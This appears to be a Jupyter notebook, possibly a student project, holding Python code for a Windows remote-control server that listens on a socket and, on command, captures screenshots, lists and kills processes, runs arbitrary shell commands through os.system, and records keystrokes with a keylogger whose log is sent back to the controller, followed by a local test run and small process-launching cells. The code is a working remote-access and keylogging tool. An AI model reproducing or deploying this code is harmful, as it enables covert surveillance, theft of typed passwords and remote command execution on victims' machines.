In [4]:
import socket
import pickle
from boltons import socketutils
from pynput import keyboard
from PIL import ImageGrab
import os
import wmi

SERVER = ""
PORT = 1234
DELIM = b'\x00'

# dump func
def sendDump(buff, var):
    dump = pickle.dumps(var)
    dump_size = len(dump)

    buff.send(str(dump_size).encode() + DELIM)
    buff.send(dump)
    print(f'\tSent dump data. Size: {dump_size}')

# keylogger func
def keylogger_Server(buff):
    def on_press(key):
        nonlocal string
        try:
            string += key.char
        except AttributeError:
            _key = str(key).split('.')[1].upper()

            if _key == 'ENTER':
                string += f'[{_key}]\n'
            elif _key == 'SPACE':
                string += ' '
            elif _key == 'BACKSPACE':
                string = string[:-1]
            else:
                string += f'[{_key}]'

    print('KEYLOGGER FUNCTION')
    string = ''
    isHook = False

    while True:
        flag = buff.recv_until(DELIM).decode()
        print(f'\tReceive: {flag}')
        
        if flag == 'hook' and not isHook:
            listener = keyboard.Listener(on_press = on_press)
            listener.start()
            isHook = True
        elif flag == 'unhook' and isHook:
            listener.stop()
            isHook = False
        elif flag == 'clear':
            string = ''
        elif flag == 'send':
            buff.send(string.encode() + DELIM)
        elif flag == 'exit':
            if isHook:
                listener.stop()
            break
        
# kill process func
def getKillProcess(buff):
    pid = int(buff.recv_until(DELIM).decode())
    print(f'KILL PROCESS {pid}')

    try:
        os.kill(pid, 9)
    except:
        print('\t Err: No process with uid exist')

# process list func
def sendProcessList(buff):
    print('SEND PROCESS LIST')
    f = wmi.WMI()

    process_data = []
    for process in f.Win32_Process(["ProcessId", "Name", "ThreadCount"]):
        process_data.append([process.ProcessId, process.Name, process.ThreadCount])

    sendDump(buff, process_data)

#  screenshot func
def sendScreenShot(buff):
    print('SEND SCREENSHOT')
    image = ImageGrab.grab()
    
    sendDump(buff, image)

#close connection
def closeConnection(buff):
    print('CLOSE CONNECTION')
    buff.close()

# create socket
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
    s.bind((SERVER, PORT))

    # start socket and wait to connect
    print("Starting Server!")
    s.listen()
    conn, addr = s.accept()
    print("Connected by: ", addr)


    buff = socketutils.BufferedSocket(conn, None)

    while True:
        flag = buff.recv_until(b'!F!').decode()
        print(f'Receive: {flag}')
        
        if flag == 'screenshot':
            sendScreenShot(buff)
        elif flag == 'processlist':
            sendProcessList(buff)
        elif flag == 'killprocess':
            getKillProcess(buff)
        elif flag == 'command':
            getCommand(buff)
        elif flag == 'keylogger':
            keylogger_Server(buff)
        else:
            closeConnection(buff)
            break

        

Starting Server!
Connected by:  ('127.0.0.1', 56771)
Receive: keylogger
KEYLOGGER FUNCTION
	Receive: hook
	Receive: unhook
	Receive: send
	Receive: clear
	Receive: send
	Receive: exit
Receive: close
CLOSE CONNECTION


In [ ]:
# vấn đề với hàm cmd
def getCommand(buff):
    command = (buff.recv_until(DELIM).decode())
    print(f'COMMAND {command}')

    returnVal = os.system(command)
    sendDump(buff, returnVal)

In [ ]:
import subprocess
import win32api
import win32process


#subprocess.Popen('notepad')
#win32api.ShellExecute(None, None, "notepad.exe", None, None, 5)
win32process.CreateProcess(None, "C:\\Program Files (x86)\\Microsoft Office\\root\\Office16\\MSACCESS.EXE", None, None, 8, win32process.NORMAL_PRIORITY_CLASS, None, None, win32process.STARTUPINFO())

In [ ]:
import subprocess
cmd = 'powershell "gps | where {$_.MainWindowTitle } | select Description'
proc = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE)
for line in proc.stdout:
    if line.rstrip():
        # only print lines that are not empty
        # decode() is necessary to get rid of the binary string (b')
        # rstrip() to remove `\r\n`
        print(line.decode().rstrip())